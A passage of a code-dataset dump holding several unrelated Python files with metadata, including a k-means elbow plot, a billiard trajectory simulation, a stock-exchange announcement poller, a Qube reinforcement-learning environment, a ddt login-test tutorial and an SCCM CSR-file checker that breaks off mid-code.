"huawei_api.py", "file_ext": "py", "file_size_in_byte": 7518, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.basicConfig", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.BASIC_FORMAT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 37, "usage_type": "call"}, {"api_name": "hashlib.pbkdf2_hmac", "line_number": 53, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 55, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 56, "usage_type": "attribute"}, 
{"api_name": "hashlib.sha256", "line_number": 57, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 59, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 60, "usage_type": "attribute"}, {"api_name": "binascii.hexlify", "line_number": 69, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 72, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 74, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 110, "usage_type": "attribute"}, {"api_name": "xmltodict.parse", "line_number": 118, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 122, "usage_type": "call"}, {"api_name": "xmltodict.unparse", "line_number": 134, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 136, "usage_type": "attribute"}, {"api_name": "xmltodict.parse", "line_number": 144, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 148, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 162, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 162, "usage_type": "name"}]}
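The __get_client_proof method above XORs two HMAC digests byte by byte with ord(), which only works on Python 2 byte strings. A sketch of the same XOR step in Python 3, where indexing bytes already yields integers; the keys and messages below are placeholders, not the values Huawei's handshake actually feeds in:

import hashlib
import hmac

def xor_digests(a, b):
    # Byte-wise XOR of two equal-length digests.
    return bytes(x ^ y for x, y in zip(a, b))

# Placeholder inputs for illustration only.
client_key = hmac.new(b'Client Key', b'salted password', hashlib.sha256).digest()
signature = hmac.new(b'auth message', b'stored key', hashlib.sha256).digest()
print(xor_digests(client_key, signature).hex())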
+{"seq_id": "56481994", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets import load_digits\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\n\nnp.random.seed(42)\n\ndigits = load_digits()\ndata = scale(digits.data)\n\nx = []\ny = []\n\nfor i in range(1, 20):\n    reduced_data = PCA(n_components=2).fit_transform(data)\n    # print(reduced_data)\n    kmeans = KMeans(init='k-means++', n_clusters=i, n_init=10)\n    kmeans.fit(reduced_data)\n\n    # cluster centers\n    centroids = kmeans.cluster_centers_\n    error = kmeans.inertia_\n    # print(centroids)\n    print(error)\n    x.append(i)\n    y.append(error)\n\nplt.scatter(x, y)\nplt.plot(x, y, '-o')\nplt.show()\n", "sub_path": "assignment3/src/test-k-means-cost-function.py", "file_name": "test-k-means-cost-function.py", "file_ext": "py", "file_size_in_byte": 710, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sklearn.datasets.load_digits", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}]}
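The elbow script above leaves picking k to the eye. One common heuristic, not part of the record, picks the elbow programmatically as the k with the largest second difference of the inertia curve:

import numpy as np

def pick_elbow(ks, inertias):
    # The elbow is where the curve bends hardest, i.e. where the
    # discrete second derivative of the inertia is largest.
    second_diff = np.diff(inertias, 2)
    return ks[int(np.argmax(second_diff)) + 1]

ks = list(range(1, 20))
inertias = [1000.0 / k for k in ks]  # toy curve for illustration
print(pick_elbow(ks, inertias))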
+{"seq_id": "239951343", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\nThis is a temporary script file.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pylab import *\nx=[(2 + 2 ** 0.5) / 2.0]\ny=[(2 ** 0.5) / 2.0]\nvx, vy=0, 2\ntime,i,dt=0,0,0.001\nsdt=0.00001\nvelocity=[4]\nwhile time<=300:\n X = x[i] + vx * dt\n Y = y[i] + vy * dt\n if Y > 0 and Y < 2 ** 0.5:\n if X >= (2 + 2 ** 0.5) / 2.0:\n if Y > X - 2:\n x.append(X)\n y.append(Y)\n velocity.append(vx)\n else:\n x1 = x[i] + vx * sdt\n y1 = y[i] + vy * sdt\n if y1 > x1 - 2:\n x.append(x1)\n y.append(y1)\n velocity.append(vx)\n else:\n cash1 = vx \n cash2 = vy\n vx = cash2\n vy = cash1 \n x.append(x[i] + vx * sdt)\n y.append(y[i] + vy * sdt)\n velocity.append(vx)\n if X < (2 + 2 ** 0.5) / 2.0:\n if Y < X:\n x.append(X)\n y.append(Y)\n velocity.append(vx)\n else:\n x2 = x[i] + vx * sdt\n y2 = y[i] + vy*sdt\n if y2 < x2:\n x.append(x2)\n y.append(y2)\n velocity.append(vx)\n else:\n cash3 = vx\n cash4 = vy\n vx = cash4\n vy = cash3\n x.append(x[i]+vx*sdt)\n y.append(y[i]+vy*sdt)\n velocity.append(vx)\n if Y >= 2 ** 0.5:\n x4 = x[i] + vx * sdt\n y4 = y[i] + vy * sdt\n if y4 < 2 ** 0.5:\n x.append(x4)\n y.append(y4)\n velocity.append(vx)\n else: \n vy=-vy\n x.append(x[i]+vx*sdt)\n y.append(y[i]+vy*sdt)\n velocity.append(vx)\n if Y <= 0:\n x3=x[i]+vx*sdt\n y3=y[i]+vy*sdt\n if y3 > 0:\n x.append(x3)\n y.append(y3)\n velocity.append(vx)\n else: \n vy=-vy\n x.append(x[i]+vx*sdt)\n y.append(y[i]+vy*sdt)\n velocity.append(vx)\n time=time+dt\n i=i+1\nplt.figure(figsize=(16,5.5))\nsubplot(1,2,1)\nplt.title(\"vx0=0,vy0=2\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.xticks([0,0.5,1,1.5,2,2.5,3,3.5])\nplt.yticks([0,0.5,1,1.5])\nplt.xlim(0, 3.5)\nplt.ylim(0, 2)\nplt.plot([0, 2 ** 0.5],[0, 2 ** 0.5],color=\"blue\",label=\"rhombus\",linewidth=2)\nplt.plot([2 ** 0.5, 2 + 2 ** 0.5],[2 ** 0.5, 2 ** 0.5],color=\"blue\",linewidth=2)\nplt.plot([2 + 2 ** 0.5, 2],[2 ** 0.5, 0],color=\"blue\",linewidth=2)\nplt.plot([0, 2],[0, 0],color=\"blue\",linewidth=2)\nplt.plot(x,y,label=\"trajectory\",color=\"red\")\nplt.scatter((2 + 2 ** 0.5) / 2.0,(2 ** 0.5) / 2.0,color=\"black\",alpha=1,linewidth=4,label=\"initial\")\nplt.legend()\nsubplot(1,2,2)\nplt.xlabel(\"x\")\nplt.ylabel(\"vx\")\nfor i in range(1000):\n if 1000*i<=len(x):\n plt.scatter(x[1000*i],velocity[1000*i])\nplt.show()\n", "sub_path": "Materials 08.py", "file_name": "Materials 08.py", "file_ext": "py", "file_size_in_byte": 3115, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.xlim", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}]}
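The cash1/cash2 swaps in the billiard record above implement specular reflection off the rhombus's 45-degree walls: for a wall along y = x (or y = x - 2), bouncing simply exchanges the velocity components. A one-line sketch of that rule:

def reflect_off_45_wall(vx, vy):
    # Reflection across a wall parallel to y = x swaps the components.
    return vy, vx

print(reflect_off_45_wall(0, 2))  # the initial vertical velocity becomes horizontal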
+{"seq_id": "362134444", "text": "import json\nimport requests\n\n\ndef get_queue_name(service_id):\n f = open('./api/workflow.json')\n data = json.load(f)\n\n queue_name = '-'\n for x in data:\n for key, value in x.items():\n if key == service_id:\n queue_name = value\n\n f.close()\n\n params = {\"service_id\": service_id,\n \"queue_name\": queue_name}\n requests.post('http://127.0.0.1:5001/api/v1/skipper/logger/log_workflow', json=params)\n\n return queue_name\n", "sub_path": "workflow/api/workflow.py", "file_name": "workflow.py", "file_ext": "py", "file_size_in_byte": 479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "369458710", "text": "import requests\nimport datetime\nimport tkinter as tk\nimport tkinter.font as tk_font\nimport webbrowser\nfrom playsound import playsound\nimport os\nimport time\n\n\ndef open_link(rep_id):\n webbrowser.open(f'https://maya.tase.co.il/reports/details/{rep_id}')\n\n\ndef get_reports():\n headers = {\n 'Connection': 'keep-alive',\n 'Accept': 'application/json, text/plain, */*',\n 'DNT': '1',\n 'Accept-Language': 'he-IL',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/85.0.4183.83 Safari/537.36',\n 'X-Maya-With': 'allow',\n 'Origin': 'https://maya.tase.co.il',\n 'Sec-Fetch-Site': 'same-site',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Dest': 'empty',\n 'Referer': 'https://maya.tase.co.il/reports/breakingannouncement',\n }\n\n try:\n response = requests.get('https://mayaapi.tase.co.il/api/report/breakingannouncement', headers=headers)\n except:\n print('request timed out. sleeping for 30 seconds...')\n time.sleep(30)\n return get_reports()\n\n top_reports = []\n for report in response.json()['Reports'][:5]:\n try:\n try:\n date = datetime.datetime.strptime(report['PubDate'], '%Y-%m-%dT%H:%M:%S.%f').strftime('%H:%M %d/%m/%Y')\n except:\n date = report['PubDate']\n top_reports.append({\n 'id': report['RptCode'],\n 'text': report['Subject'].strip(),\n 'date': date,\n 'company': report['FormalCompanyData']['CompanyName'].strip()\n })\n except Exception as e:\n pass\n return top_reports\n\n\ndef render_reports(reports):\n for wd in root.winfo_children():\n wd.destroy()\n\n for i, report in enumerate(reports):\n main_frame = tk.Frame(master=root, padx=5, bg='#e1e1e1', highlightbackground=\"#cccccc\",\n highlightthickness=1)\n upper_frame = tk.Frame(master=main_frame, pady=3)\n tk.Label(upper_frame, text=f'{report[\"date\"]} ', font=fontStyle,\n width=15, bg='#ff8e6e').grid(row=0, column=0, sticky=tk.W)\n tk.Label(upper_frame, text=report['company'], font=fontStyle, width=25, bg='#ff8e6e').grid(row=0, column=1)\n tk.Button(\n upper_frame, text='open link',\n command=lambda rep_id=report['id']: open_link(rep_id)\n ).grid(row=0, column=2, sticky=tk.E)\n\n lower_frame = tk.Frame(master=main_frame, pady=3)\n tk.Label(lower_frame, text=report['text'], font=fontStyle,\n wraplength=400, anchor=tk.E, width=47).grid(row=0, column=0)\n upper_frame.grid(row=0, column=0, columnspan=2)\n lower_frame.grid(row=1, column=0)\n main_frame.grid(row=i, column=0)\n\n\ndef check_for_updates():\n global report_ids\n print('checking for updates...')\n\n reports = get_reports()\n new_report_ids = [report['id'] for report in reports]\n if not report_ids:\n report_ids = new_report_ids\n render_reports(reports)\n else:\n if report_ids != new_report_ids:\n report_ids = new_report_ids\n print('reports updated')\n playsound(sound_file)\n render_reports(reports)\n else:\n pass\n root.after(3000, check_for_updates)\n\n\nif __name__ == '__main__':\n sound_file = os.path.join(os.path.dirname(__file__), 'beep.mp3')\n root = tk.Tk()\n root.title(\"Check Reports\")\n root.resizable(False, False)\n fontStyle = tk_font.Font(size=12)\n report_ids = None\n\n check_for_updates()\n root.mainloop()\n", "sub_path": "check_breaking_announcements.py", "file_name": "check_breaking_announcements.py", "file_ext": "py", "file_size_in_byte": 3683, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "webbrowser.open", "line_number": 12, "usage_type": "call"}, {"api_name": 
"requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 64, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 67, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 68, "usage_type": "call"}, {"api_name": "tkinter.E", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 74, "usage_type": "call"}, {"api_name": "tkinter.E", "line_number": 75, "usage_type": "attribute"}, {"api_name": "playsound.playsound", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 102, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 103, "usage_type": "call"}, {"api_name": "tkinter.font.Font", "line_number": 106, "usage_type": "call"}, {"api_name": "tkinter.font", "line_number": 106, "usage_type": "name"}]}
+{"seq_id": "147603329", "text": "from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nfrom gym import spaces\nfrom gym_brt.envs.qube_base_env import \\\n QubeBaseEnv, \\\n normalize_angle, \\\n ACTION_HIGH, \\\n ACTION_LOW\n\n\nclass QubeBeginDownReward(object):\n def __init__(self):\n self.target_space = spaces.Box(\n low=ACTION_LOW,\n high=ACTION_HIGH, dtype=np.float32)\n\n def __call__(self, state, action):\n theta_x = state[0]\n theta_y = state[1]\n alpha_x = state[2]\n alpha_y = state[3]\n theta_velocity = state[4]\n alpha_velocity = state[5]\n theta_acceleration = state[6]\n alpha_acceleration = state[7]\n\n theta = np.arctan2(theta_y, theta_x) # arm\n alpha = np.arctan2(alpha_y, alpha_x) # pole\n\n cost = normalize_angle(theta)**4 + \\\n normalize_angle(alpha)**2 + \\\n 0.1 * alpha_velocity**2\n\n reward = -cost\n return reward\n\n\nclass QubeBeginDownEnv(QubeBaseEnv):\n def __init__(self, frequency=1000, use_simulator=False):\n super(QubeBeginDownEnv, self).__init__(\n frequency=frequency,\n use_simulator=use_simulator)\n self.reward_fn = QubeBeginDownReward()\n\n\ndef main():\n num_episodes = 10\n num_steps = 250\n\n with QubeBeginDownEnv() as env:\n for episode in range(num_episodes):\n state = env.reset()\n for step in range(num_steps):\n action = env.action_space.sample()\n state, reward, done, _ = env.step(action)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "gym_brt/envs/qube_begin_down_env.py", "file_name": "qube_begin_down_env.py", "file_ext": "py", "file_size_in_byte": 1643, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "gym.spaces.Box", "line_number": 16, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 16, "usage_type": "name"}, {"api_name": "gym_brt.envs.qube_base_env.ACTION_LOW", "line_number": 17, "usage_type": "name"}, {"api_name": "gym_brt.envs.qube_base_env.ACTION_HIGH", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 31, "usage_type": "call"}, {"api_name": "gym_brt.envs.qube_base_env.normalize_angle", "line_number": 33, "usage_type": "call"}, {"api_name": "gym_brt.envs.qube_base_env.normalize_angle", "line_number": 34, "usage_type": "call"}, {"api_name": "gym_brt.envs.qube_base_env.QubeBaseEnv", "line_number": 41, "usage_type": "name"}]}
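The reward in the record above penalizes the arm angle to the fourth power, the pole angle squared, and the pole velocity quadratically. A standalone numeric sketch, assuming normalize_angle wraps angles into [-pi, pi) (the real helper lives in gym_brt.envs.qube_base_env):

import numpy as np

def normalize_angle(angle):
    # Assumed behavior: wrap into [-pi, pi).
    return (angle + np.pi) % (2.0 * np.pi) - np.pi

def reward(theta, alpha, alpha_velocity):
    cost = normalize_angle(theta) ** 4 + \
        normalize_angle(alpha) ** 2 + \
        0.1 * alpha_velocity ** 2
    return -cost

# A pole hanging straight down (alpha = pi) is maximally penalized.
print(reward(theta=0.0, alpha=np.pi, alpha_velocity=0.0))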
+{"seq_id": "428736258", "text": "#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n# email: wagyu2016@163.com\n# wechat: shoubian01\n# author: 王雨泽\n\"\"\"\nddt: the data driven testing idea\nYou will learn the data driven testing idea here.\n\nWhat we discuss now is a python library called ddt.\nThe ddt library is used together with unittest; it is a plugin for unittest.\npython / unittest / ddt automated testing framework\n\n\n@ddt.ddt takes no parentheses\nclass TestDemo:\n\n    @ddt.data() takes parentheses\n    def test_demo(self):\n        pass\n\n\"\"\"\nimport unittest\nimport ddt\n\nfrom class_19_excel.common.excel_handler import ExcelHandler\nfrom class_19_excel.common.requests_handler import RequestsHandler\n\n\n\ntest_data = [\n    {\"url\": \"http://120.78.128.25:8766/futureloan/member/login\",\n    \"method\": \"post\",\n    \"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v2\"},\n    \"data\": {\"mobile_phone\": \"18111111111\", \"pwd\": \"12345678\"},\n    \"expected\": {\"msg\":\"\", \"code\":\"\"}},\n\n    {\"url\": \"http://120.78.128.25:8766/futureloan/member/login\",\n    \"method\": \"post\",\n    \"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v2\"},\n    \"data\": {\"mobile_phone\": \"1811\", \"pwd\": \"123\"},\n    \"expected\": \"hello world\"},\n    ]\n\n\ntest_data = ExcelHandler(r\"d:\\cases.xlsx\").read('Sheet1')\nprint(test_data)\n\n\n@ddt.ddt\nclass TestLogin(unittest.TestCase):\n\n    # def setUp(self) -> None:\n\n    # Part of the preconditions\n    # Code that runs before every single test case method\n    def setUp(self):\n        pass\n\n    def tearDown(self):\n        print(\"Test case finished.\")\n\n    @ddt.data(*test_data)\n    # Each set of test data from *test_data is bound to the data_info parameter\n    def test_login(self, data_info):\n        res = RequestsHandler().visit(data_info['url'],\n                                      data_info['method'],\n                                      json=data_info['data'],\n                                      headers=data_info['headers'])\n\n        self.assertEqual(res, data_info['expected'])\n\n\nif __name__ == '__main__':\n    unittest.main()\n    # test_login()\n\n", "sub_path": "python 25 code/class19_20200102_excel_ddt/yuz/test_cases/test_login.py", "file_name": "test_login.py", "file_ext": "py", "file_size_in_byte": 2074, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "class_19_excel.common.excel_handler.ExcelHandler", "line_number": 46, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 51, "usage_type": "attribute"}, {"api_name": "class_19_excel.common.requests_handler.RequestsHandler", "line_number": 66, "usage_type": "call"}, {"api_name": "ddt.data", "line_number": 63, "usage_type": "call"}, {"api_name": "ddt.ddt", "line_number": 50, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 75, "usage_type": "call"}]}
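For reference, ddt can also unpack each data tuple into separate arguments with @ddt.unpack; a minimal self-contained variant of the pattern used in the record above:

import unittest
import ddt

@ddt.ddt
class TestSquare(unittest.TestCase):

    # Each tuple generates its own test method; @ddt.unpack splits the
    # tuple into positional arguments.
    @ddt.data((2, 4), (3, 9))
    @ddt.unpack
    def test_square(self, n, expected):
        self.assertEqual(n * n, expected)

if __name__ == '__main__':
    unittest.main()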
+{"seq_id": "410041375", "text": "#!/usr/bin/env python\n'''\n Usage:\n findMissingCSR.py [-h] [-v]\n [-y YEAR]\n [-m {01,02,03,04,05,06,07,08,09,10,11,12}]\n [-d {01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16,17,18,19,20,\n 21,22,23,24,25,26,27,28,29,30,31}]\n\n Optional arguments:\n -h, --help\n show this help message and exit\n -v, --verbose\n Will print INFO, WARNING, and ERROR messages to the stdout or stderr\n -y YEAR, --year YEAR The year in CCYY format. \n Defaults to the current year.\n -m {01,02,03,04,05,06,07,08,09,10,11,12},\n --month {01,02,03,04,05,06,07,08,09,10,11,12}\n The two-digit number of the month (01-12). Defaults to\n the current month.\n -d {01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16,17,18,19,20,\n 21,22,23,24,25,26,27,28,29,30,31}, \n --day {01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16,17,18,19,20,\n 21,22,23,24,25,26,27,28,29,30,31}\n The two-digit number of the day. Defaults to the current day.\n -a, --allday\n Check all 24 hours of the day (00:00:00 to 23:00:00).\n -u, --uptonow\n Check all hours of the day up to 'now' (00:00:00 to XX:00:00).\n\n Description:\n This program will check the CSR files from MCS looking for missing data.\n It will make a list of the \"missing hours\" and notify the appropriate \n people (i.e. the people listed under the MCS_checker group in the \n distribution list JSON file.)\n Not to be confused with csr_checker.py\n\n Author:\n Alan Verdugo (alanvemu@mx1.ibm.com)\n\n Creation date:\n 2016-11-21\n\n Modification list:\n CCYY-MM-DD Author Description\n 2017-11-21 Alan Verdugo Improved error checking.\n 2017-11-23 Alan Verdugo All time-handling is now done in \n UTC.\n We now also check if the metadata \n fields are present in every CSR \n record.\n Minor improvements.\n'''\n\n# Needed for system and environment information.\nimport os\n\n# Needed for system and environment information.\nimport sys\n\n# Needed for system and environment information.\nimport socket\n\n# For timestamp information in the email subject.\nfrom datetime import datetime\n\n# Handling arguments.\nimport argparse\n\n# Custom module for email sending (refer to emailer.py)\nimport emailer\n\n# Handle logging.\nimport logging\n\n# to read the CSR file(s).\nimport csv\n\n# To get the providers from its \"JSON\" file.\nimport json\n\n\n# Home of the SCCM installation.\nsccm_home = os.path.join(os.sep, \"opt\", \"ibm\", \"sccm\")\n\n# The path where this script and the distribution list are located.\nbinary_home = os.path.join(sccm_home, \"bin\", \"custom\")\n\n# Location path of SCCM collector logs.\nCOLLECTOR_LOGS = os.path.join(sccm_home, \"samples\", \"logs\", \"collectors\")\n\n# Path where MCS data resides.\nmcs_home = os.path.join(sccm_home,'wlp', 'usr', 'servers', 'mcs')\n\n# MCS configuration file of providers.\nprovider_file = os.path.join(mcs_home, 'data', 'providers.json')\n\n# Logs home directory.\nlog_dir = os.path.join(os.sep, \"tmp\", \"logs\", \"sccm\")\nlog_filename = \"checkMCS_\" + str(datetime.now().strftime(\"%Y%m%d\")) + \".log\"\nfull_log_file_name = os.path.join(log_dir, log_filename)\n\n# The hostname where this is running.\nhostname = socket.gethostname()\n\n# Email sender address.\nemail_from = \"SCCM_\" + hostname + \"@\" + hostname\n\n# List of metadata fields that should be present in every CSR record.\nmetadata = [\"ActionInProgress\", \"NetworkZone\", \"TemplateName\"]\n\n# JSON Object of mail_list_file.\nmail_list = \"\"\n\n# Email distribution group.\ndistribution_group = \"MCS_checker\"\n\n# Error list initialization 
(just in case we need it).\nerrors = []\nerrors_found = False\n\n# Logging configuration.\nlog = logging.getLogger(\"findMissingCSR\")\nlogging.basicConfig(filemode = 'a')\nfh = logging.FileHandler(full_log_file_name)\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nlog.addHandler(fh)\n\n\ndef handle_error(error):\n '''\n To avoid duplication of code, this function will take an error message \n and append it to the \"errors\" list (which then will be used to build \n the notification email). It will also log the error and set the \n boolean variable \"errors_found\" to True.\n '''\n global errors_found\n errors_found = True\n errors.append(error)\n log.error(error)\n\n\ndef get_providers():\n '''\n (Based on Scott's get_providers.py)\n The providers file, for ridiculous and mysterious reason stores one JSON \n object per line, so we cannot parse the file in the normal way. We have \n to parse each line as if it were a complete JSON file.\n '''\n try:\n providers = []\n with open(provider_file, \"rb\") as file_handle:\n for row in file_handle:\n provider_line = json.loads(row)\n providers.append(provider_line['provider_name'])\n return providers\n except Exception as exception:\n handle_error(\"Error reading providers file {0} \\nException: \"\\\n \"{1}\".format(provider_file, exception))\n\n\ndef search_metadata(row):\n '''\n This function will receive a CSR record and look for all the value of \n the metadata list in it. If all the values are found in the record, it \n will return True, otherwise it will return False (so, if any metadata\n field is missing, we will get an alert).\n '''\n found_fields = 0\n for field in metadata:\n if field in row:\n found_fields += 1\n if found_fields == len(metadata):\n return True\n else:\n return False\n\n\ndef main(full_date, all_day, up_to_now):\n # Initializing the errors list with a \"header\" value.\n errors.append(\"The following errors were found while verifying the MCS \"\\\n \"data for {0} in {1}:\\n\".format(full_date, hostname))\n\n # Get a list of providers using the get_providers() function.\n providers = get_providers()\n if providers is None:\n handle_error(\"No active MCS providers were found in {0}\"\\\n .format(provider_file))\n else:\n # Infer the \"process\" from the provider name.\n for provider in providers:\n if provider.endswith(\"_nova\"):\n process = \"nova_compute\"\n elif provider.endswith(\"_cinder\"):\n # per Charlotte Despres, ICO's OpenStack cinder does not support \n # additional volumes with VMware, so we expect no records.\n # Let's just silently ignore any cinder providers with \"VMWARE\" \n # on their names.\n if \"VMWARE\" in provider:\n log.info(\"Ignoring provider {0} (Currently, there is no \"\\\n \"support for VMware cinder).\".format(provider))\n continue\n else:\n process = \"cinder_volume\"\n else:\n handle_error(\"The provider {0} is not valid.\".format(provider))\n feed = provider\n\n log.info(\"Checking CSR files for {0}...\\n\\tIn feed: {1}\\n\\tIn \"\\\n \"process: {2}\".format(full_date, feed, process))\n\n # Build the full path and filename of the input file.\n input_file = full_date + \".txt\"\n input_file_path = os.path.join(COLLECTOR_LOGS, process, feed)\n full_input_file = os.path.join(input_file_path, input_file)\n\n # 